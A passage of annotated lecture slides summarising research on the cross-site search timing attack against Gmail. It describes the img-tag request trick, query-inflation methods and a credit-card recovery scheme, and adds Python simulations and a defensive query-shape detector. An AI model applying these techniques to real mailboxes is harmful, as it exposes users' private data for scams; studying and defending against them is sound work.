  • 61. Motivation ● What request will you send? – many requests for common names on his Gmail? → find out visitor's real name – many requests for xxxx-xxx-xxx on his Gmail? → find out visitor's phone number – many requests for no-reply@xxx.com? ● no-reply@firstbank.com.tw → a client of Taiwan FirstBank? ● no-reply@cht.tw → a mobile user of ChungHua Telecom? ● no-reply@amazon.com → likes to shop at Amazon? Notes: Also, everyone has probably received mail from no-reply@xxx: subscribed blogs, YouTube trending videos, periodic bank digests, and so on. So you could learn whether the visitor is a customer of Taiwan's First Bank, a Chunghwa Telecom subscriber, or has shopped at Amazon. The more of this you know, the more convincing a scam message you can craft.
  • 62. Motivation ● If you can make your visitor – send any requests – and measure the response time ● Targeting the search service can find more sensitive information Notes: So if you can make the visitor's browser send requests and time them, targeting the search service looks like a good way to find sensitive information.
  • 63. Motivation ● You can make your visitor – send any requests – and measure the response time – XS-Timing Attack Notes: The technique assumed at the start, making the visitor's browser send requests and timing them, is the XS-Timing Attack.
  • 64. Motivation ● You can make your visitor – send any requests – and measure the response time ● XS Search Attack = XS-Timing Attack on search service – XS-Timing Attack Notes: Targeting the search service is then the XS Search Attack. But using XS-Timing faces a big challenge; this paper is the first to find that search services happen to resolve the XS-Timing challenge, making this attack a real threat.
  • 65. Outline ● Motivation ● Background – XS-Timing Attack ● Challenge: XS-Timing Attack ● Problem – How to utilize characteristics of search service to overcome challenge ● Solution ● Evaluation ● Conclusion
  • 66. XS-Timing Attack ● You can make your visitor – send any requests – and measure the response time ● Questions – How to make the visitor send a request? – Why not the response content? Notes: First, how does the XS-Timing Attack make the visitor send any request you want? Second, why can you only measure time, and not obtain the response content?
  • 67. XS-Timing Attack Notes: Suppose the request you want the visitor to send searches the Gmail mailbox for mail containing "little mountain".
  • 68. XS-Timing Attack URL = https://mail.google.com/mail/#search/little mountain Notes: The request URL looks like this. How do you make the browser send the request automatically?
  • 69. XS-Timing Attack URL = https://mail.google.com/mail/#search/little mountain <img src="https://mail.google.com/mail/#search/little mountain"> Notes: Anyone who has written a web page knows that when the browser parses certain tags, such as the image tag, it automatically sends a GET to fetch the resource. So if you put the URL in the image's source, the visitor's browser sends this request automatically while loading the page.
  • 70. XS-Timing Attack (diagram: evil.com serves <html> <img src="mail.google.com/mail/#search/little mountain"> ... </html>; the request goes to google.com) Notes: But so far the first question is only half answered, because you must be logged in to the mailbox to search in it. Websites use cookies to tell whether you are logged in, so this Gmail search request must carry the Gmail cookie to be processed by Gmail. Does the browser attach cookies to a request sent by an img tag?
  • 71. XS-Timing Attack (diagram: evil.com serves <html> <img src="mail.google.com/mail/#search/little mountain"> ... </html>; the request goes to google.com) Notes: The answer is yes: the browser looks at the request's destination, here Gmail, and the cookies in the browser for Gmail's domain are sent along automatically.
  • 72. XS-Timing Attack (diagram: evil.com serves <html> <img src="mail.google.com/mail/#search/little mountain"> ... </html>; the request goes to google.com) Notes: After receiving the request, Gmail processes it and returns the search results.
  • 73. XS-Timing Attack (diagram: evil.com serves <html> <img src="mail.google.com/mail/#search/little mountain"> ... </html>; the request goes to google.com) Same-Origin Policy Notes: When the browser receives it, it checks the type and finds it is a web page, but it was told it was fetching an image. So the browser knows this site wants to do something bad with the page and forbids the site from reading the response content, which greatly limits the harm it can do. The whole set of rules about which resources the browser may automatically request, which it may not, and what to do when it is tricked, is what the same-origin policy specifies.
  • 74. XS-Timing Attack (diagram: evil.com serves <html> <img src="mail.google.com/mail/#search/little mountain"> ... </html>; the request goes to google.com) However, you can measure the time Notes: But here is the point: even without seeing the response content, you can still measure the time from sending the request to receiving the response. If you can measure time, you can do the XS-Timing Attack.
  • 75. Challenge: XS-Timing Attack ● Inferring by comparing timing differences often makes mistakes! Notes: The challenge of the XS-Timing Attack: the biggest difficulty is that the method just described, inferring a match by comparing the time difference against the dummy, is often wrong.
  • 76. Challenge: XS-Timing Attack ● Inferring by comparing timing differences often makes mistakes! ● Response time = T(communication)+T(computation) Notes: The reason: first, the measured response time is the communication time of the network round trip plus the computation time the server spends processing the request.
  • 77. Challenge: XS-Timing Attack ● Inferring by comparing timing differences often makes mistakes! ● Response time = T(communication)+T(computation) ● Network condition – Bad: timing difference dominated by T(communication) – Good: T(computation) difference might be too small Notes: First, when the network is bad, even if there is a time difference from the dummy, you cannot tell whether it is really due to results rather than delay. Second, assuming the network is stable and the communication time fixed, servers today are very powerful, so with or without results the computation may be so fast that no difference is visible.
  • 78. Challenge: XS-Timing Attack ● Inferring by comparing timing differences often makes mistakes! ● Response time = T(communication)+T(computation) ● Network condition – Bad: timing difference dominated by T(communication) – Good: T(computation) difference might be too small (measurement: dummy => 0 matches, 10 samples, avg 734ms; target => 50 matches, 10 samples, avg 751ms) Notes: Here is a data point: I wrote a site that can do XS-Timing and, on the stable dorm network, measured the time to search my own mailbox for two strings: a dummy, a random string with no match, and my account name, with 50 matches. I sent 10 of each and averaged the times; the gap was only about 25 ms. So using the XS-Timing Attack directly, even on a stable network and with 50 matches, is quite likely to misjudge.
  • 79. Problem ● dummy query: always responds fast ● target query – fast => empty – slower => non-empty → enlarge the difference ● Response time = T(communication)+T(computation) Notes: The key to improving the timing attack is to enlarge the time difference from the dummy when there are results.
  • 80. Main Idea ● Enlarge timing difference strategy – T(communication) ∝ content length → Response-Inflate – T(computation) → Compute-Inflate Notes: There are two directions for enlarging the time difference: 1. make the response longer when there is a match, increasing network transfer time; 2. increase the computation when there is a match.
  • 81. Response-Inflate ● Observation: the search query is copied once for each matched entry Notes: The way to increase length is based on this observation: in the results, the search query is copied once for every matched entry.
  • 82. Response-Inflate ● Observation: the search query is copied once for each matched entry => extend to max(query size) < 8KB Notes: So as long as the query is longer, the response is longer; you can use OR to lengthen the query without changing the search results.
  • 83. Compute-Inflate ● Observation: early abort on terms which resolve to false (figure: A∧B) Notes: The observation used is that the search service evaluates a query in order and, for efficiency, usually aborts early. For this query, A AND B, if the order is A then B, then when A evaluates to false it aborts immediately and skips computing B. In other words, as long as you can find a B that makes the search service compute for a long time, you can greatly enlarge the time difference when there is a match.
  • 84. Compute-Inflate ● Observation: early abort on terms which resolve to false (figure: Dummy vs Target, A∧B) Notes: In Gmail this is not hard to construct: after the word you want to search for, add has-not for a large number of words that cannot exist. With 100 of them appended, Gmail must confirm that none of those words is present before it can return.
  • 85. Compute-Inflate ● Observation: early abort on terms which resolve to false => can detect even a single match on Gmail! (figure: Dummy vs Target, A∧B) Notes: The effect is great: the claim is that in an active Gmail account, even a query with only one match can be detected.
  • 86. Evaluation: Compute-Inflate ● 138 active Gmail users – 90 university schoolmates – 48 Amazon M-Turk workers ● Sent an email containing a single sentence – "I like [random-animal]" (figure: Dummy vs Target) Notes: To evaluate the effect of compute-inflate, the experiment recruited 138 active Gmail users: 90 department classmates and 48 MTurk workers. Each person sent an email with a sentence that is certain to appear only once: I like some animal.
  • 87. Evaluation: Compute-Inflate Notes: These are the results; n is the number of samples, and after sampling a statistical test is used to decide.
  • 88. Evaluation: Compute-Inflate Notes: Look at FN: the simple query only lengthens the query without compute-inflate, and its error rate is >50%, worse than random guessing; I'm not sure the numbers are credible. Anyway, the point is that with only one match it is very easy to misjudge.
  • 89. Evaluation: Compute-Inflate Notes: With compute-inflate, FN drops below 10%, a large reduction in misjudgment. As for FP, it is low throughout; a query with no match being misjudged as matching is mainly due to network delay, so this shows network delay has little effect.
  • 90. Evaluation: Compute-Inflate Notes: As for FP, it is low throughout; a query with no match being misjudged as matching is mainly due to network delay, so this shows network delay has little effect.
  • 91. Efficient Term Identification ● Which of {T1,T2,...} appears in the mailbox? Notes: Next, more useful algorithms can be developed. Suppose you have a list of words T1, T2, and so on, and you want to know which of them have appeared in the mailbox. How would you do it?
  • 92. Efficient Term Identification ● Which of {T1,T2,...} appears in the mailbox? ● Can you come up with a better solution? ● Naive – Query terms one-by-one – O(n) Notes: The naive idea is to search the words one at a time and see which hit. But anyone who has studied algorithms should think of a better way.
  • 93. Efficient Term Identification ● Which of {T1,T2,...} appears in the mailbox? ● Can you come up with a better solution? ● Naive – Query terms one-by-one – O(n) – Binary search – O(log n) Notes: Divide and conquer using OR.
  • 94. Evaluation: Efficient Term Identification ● 138 active Gmail users ● Sent an email containing a single sentence – "I like [random-animal]" – 32 animal options (figure: accuracy vs time) Notes: The same 138 users, each sending one email with a sentence that appears only once in the mailbox, I like some animal, with 32 animal options. This experiment's goal is to accurately find which animal each person likes. The columns are different statistical tests; with 25 sends the accuracy is about 60%, with 50 sends about 70%.
  • 95. Claimed Experiment ● Attack on credit card numbers – Focus on MasterCard, Visa ● Format: 4-4-4-4 ● Attack Flow 1. Find all four 4-digit numbers (10,000 options) 2. Find the order of the 4-digit numbers ● omit wrong combinations by the credit card's checksum Notes: Next is the one I was looking forward to: they say they tested finding credit card numbers with their own accounts, but I was disappointed; probably for ethical reasons, the paper only describes the method without results. The idea is that credit card numbers have a format, groups of 4 digits separated by dashes or spaces, so divide and conquer over the 10,000 combinations of a 4-digit group finds which four 4-digit groups they are, and then you try the order.
  • 96. Conclusion ● Good discovery of how search service makes XS-Timing Attack realistic ● Typical bad paper writing style Notes: This paper's discovery that the search service can greatly improve the XS-Timing Attack, traditionally thought infeasible, is very interesting. The drawback is the writing style: it is the kind of bad paper my advisor keeps warning me not to pick. The main idea and algorithm are simple yet written in a complicated way; for the experiments, picking one representative data set would have sufficed, but they insist on doing piles of identical experiments to stuff the paper, which makes no sense, while the part everyone is interested in is glossed over. Not good; let it be a lesson to us.
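The challenge of slides 75-80 in runnable form, as an added example that is neither the paper's nor the presenter's code: a simulation of the dummy-versus-target timing decision over noisy network latency, reporting false-negative and false-positive rates with and without inflation. The latency and per-match cost parameters are constructed assumptions, chosen so that 50 matches give the 17 ms gap of slide 78.

```python
"""Timing-inference simulation for slides 75-80 (added example, not the paper's code).

Response time = T(communication) + T(computation).  The decision on slide 79 compares the
average time of a target query against a dummy query that never matches.  Every number
below is a constructed model parameter, not a measurement.
"""
import random
import statistics

COMM_MEAN_MS = 700.0      # assumed mean network round trip
COMM_JITTER_MS = 30.0     # assumed std dev of network jitter
COMP_BASE_MS = 20.0       # assumed server time for an empty result
COMP_PER_MATCH_MS = 0.34  # assumed extra server time per matched entry
                          # (50 matches ~ +17 ms, the gap on slide 78: 751 vs 734 ms)


def response_time_ms(rng, matches, inflate=1.0):
    """One measured response time: noisy communication plus match-dependent computation.

    `inflate` is a simplification of both strategies on slide 80: response-inflate and
    compute-inflate each add time proportional to the number of matches, so the model
    scales the per-match cost by `inflate`.
    """
    comm = max(0.0, rng.gauss(COMM_MEAN_MS, COMM_JITTER_MS))
    comp = COMP_BASE_MS + COMP_PER_MATCH_MS * matches * inflate
    return comm + comp


def infer_nonempty(rng, matches, samples=10, inflate=1.0, threshold_ms=30.0):
    """Decision rule of slide 79: average `samples` dummy (0-match) and target timings and
    call the target non-empty if it is slower by more than `threshold_ms`."""
    dummy = statistics.mean(response_time_ms(rng, 0, inflate) for _ in range(samples))
    target = statistics.mean(response_time_ms(rng, matches, inflate) for _ in range(samples))
    return target - dummy > threshold_ms


def error_rates(matches, inflate=1.0, trials=1000, seed=1):
    """Return (false_negative_rate, false_positive_rate): FN when the target really has
    `matches` matches and is called empty, FP when it has none and is called non-empty."""
    rng = random.Random(seed)
    fn = sum(not infer_nonempty(rng, matches, inflate=inflate) for _ in range(trials)) / trials
    fp = sum(infer_nonempty(rng, 0, inflate=inflate) for _ in range(trials)) / trials
    return fn, fp


if __name__ == "__main__":
    # Without inflation the 17 ms gap drowns in 30 ms jitter; a single match is invisible.
    # With the per-match cost inflated 1000x, a single match separates cleanly.
    for matches, inflate in [(50, 1.0), (1, 1.0), (1, 1000.0)]:
        fn, fp = error_rates(matches, inflate)
        print(f"matches={matches:3d} inflate={inflate:6.0f}  FN={fn:.3f}  FP={fp:.3f}")
```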
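From the defender's side of slides 81-85, an added example that is not Gmail's code: a shape check a search service could run on incoming queries to flag the two inflation patterns the slides describe, an OR chain that repeats a term and a long tail of negated terms. The query grammar is a simplification and every threshold is an assumption.

```python
"""Server-side shape check for inflated search queries (added example, not Gmail's code).

Slides 81-85 describe two ways a query is lengthened without changing its result set:
an OR chain that repeats a term (response-inflate, up to the ~8 KB limit on slide 82)
and a tail of negated, never-matching terms (compute-inflate, "100 has-not words" on
slide 84).  A search service can log or throttle queries with these shapes.  The
grammar is simplified (whitespace tokens, `OR`, `-term`, "quoted phrases") and every
threshold is an assumption for this example.
"""
import re
from dataclasses import dataclass, field

MAX_QUERY_BYTES = 8 * 1024   # slide 82: queries accepted up to ~8 KB
LONG_QUERY_BYTES = 1024      # assumed: ordinary mailbox queries are far shorter
MAX_OR_ALTERNATIVES = 20     # assumed threshold
MAX_NEGATED_TERMS = 10       # assumed threshold
MAX_DUPLICATE_RATIO = 0.5    # assumed: share of terms that merely repeat an earlier one

TOKEN_RE = re.compile(r'-?"[^"]*"|\S+')  # a quoted phrase (optionally negated) or a bare word

# Constructed sample queries.
BENIGN = 'from:alice "quarterly report" -draft'
OR_CHAIN = " OR ".join(['"little mountain"'] * 40)  # same result set, longer echo per match
NEGATION_TAIL = '"little mountain" ' + " ".join(f"-zz{i}qx" for i in range(100))


@dataclass
class QueryShape:
    length_bytes: int
    terms: int
    or_alternatives: int
    negated: int
    duplicate_ratio: float
    flags: list = field(default_factory=list)


def analyse_query(query: str) -> QueryShape:
    """Tokenise `query` and flag the inflation shapes of slides 81-85."""
    tokens = TOKEN_RE.findall(query)
    terms = [t for t in tokens if t != "OR"]
    or_alternatives = sum(1 for t in tokens if t == "OR")
    negated = sum(1 for t in terms if t.startswith("-") and len(t) > 1)
    normalised = [t.lstrip("-").strip('"').lower() for t in terms]
    duplicate_ratio = 1 - len(set(normalised)) / len(normalised) if normalised else 0.0
    shape = QueryShape(len(query.encode("utf-8")), len(terms),
                       or_alternatives, negated, duplicate_ratio)
    if shape.length_bytes > MAX_QUERY_BYTES:
        shape.flags.append("over the 8 KB limit")
    elif shape.length_bytes > LONG_QUERY_BYTES:
        shape.flags.append("unusually long query")
    if or_alternatives > MAX_OR_ALTERNATIVES:
        shape.flags.append("response-inflate shape: long OR chain")
    if duplicate_ratio > MAX_DUPLICATE_RATIO:
        shape.flags.append("repeated terms add length but no results")
    if negated > MAX_NEGATED_TERMS:
        shape.flags.append("compute-inflate shape: many negated terms")
    return shape


if __name__ == "__main__":
    for name, q in [("benign", BENIGN), ("or_chain", OR_CHAIN), ("negation_tail", NEGATION_TAIL)]:
        s = analyse_query(q)
        print(f"{name:14s} bytes={s.length_bytes:5d} OR={s.or_alternatives:3d} "
              f"neg={s.negated:3d} dup={s.duplicate_ratio:.2f} flags={s.flags}")
```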
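The binary search of slide 93 run against a noisy membership oracle, as an added example that is not the paper's code: it shows how the per-query error of slides 87-90 compounds over the log2(32) = 5 rounds, the kind of caveat behind the 60-70% accuracy on slide 94. The symmetric error model and the candidate names are assumptions.

```python
"""Divide-and-conquer term identification with a noisy oracle (added example, not the
paper's code).  Slide 93 replaces one query per term (O(n)) with a binary search over
OR-queries (O(log n)); slide 94 reports 60-70% accuracy over 32 options.  Here the
timing decision is modelled as a membership oracle that is wrong with some probability,
so the effect of that error over the log2(n) rounds can be seen directly.
"""
import math
import random

CANDIDATES = [f"animal{i:02d}" for i in range(32)]  # constructed stand-ins for the 32 options


def find_single_term(candidates, oracle):
    """Binary search of slide 93.  Each round asks the oracle one question about one half
    of the remaining candidates (on the slide, one OR-query of those terms) and keeps that
    half on 'yes', the other half on 'no'.  Assumes exactly one candidate is present, as in
    the slide 94 experiment.  Returns (term, oracle_queries)."""
    remaining = list(candidates)
    queries = 0
    while len(remaining) > 1:
        mid = len(remaining) // 2
        queries += 1
        remaining = remaining[:mid] if oracle(remaining[:mid]) else remaining[mid:]
    return remaining[0], queries


def make_noisy_oracle(rng, present, error_rate):
    """Mock of the per-query timing decision: answers whether `present` is in the group, but
    flips the answer with probability `error_rate` (assumed symmetric FN/FP)."""
    def oracle(group):
        truth = present in group
        return (not truth) if rng.random() < error_rate else truth
    return oracle


def simulate(error_rate, trials=4000, seed=7):
    """Return (accuracy, mean_queries) over random hidden terms."""
    rng = random.Random(seed)
    correct = 0
    total_queries = 0
    for _ in range(trials):
        present = rng.choice(CANDIDATES)
        found, queries = find_single_term(CANDIDATES, make_noisy_oracle(rng, present, error_rate))
        correct += found == present
        total_queries += queries
    return correct / trials, total_queries / trials


def expected_accuracy(error_rate, n=len(CANDIDATES)):
    """Closed form: once a round goes to the wrong half the term is lost, so every one of the
    ceil(log2 n) rounds must be answered correctly."""
    return (1 - error_rate) ** math.ceil(math.log2(n))


if __name__ == "__main__":
    for e in (0.0, 0.03, 0.07, 0.15):
        acc, q = simulate(e)
        print(f"per-query error={e:.2f}  queries={q:.1f}  accuracy={acc:.3f}  "
              f"expected={expected_accuracy(e):.3f}")
```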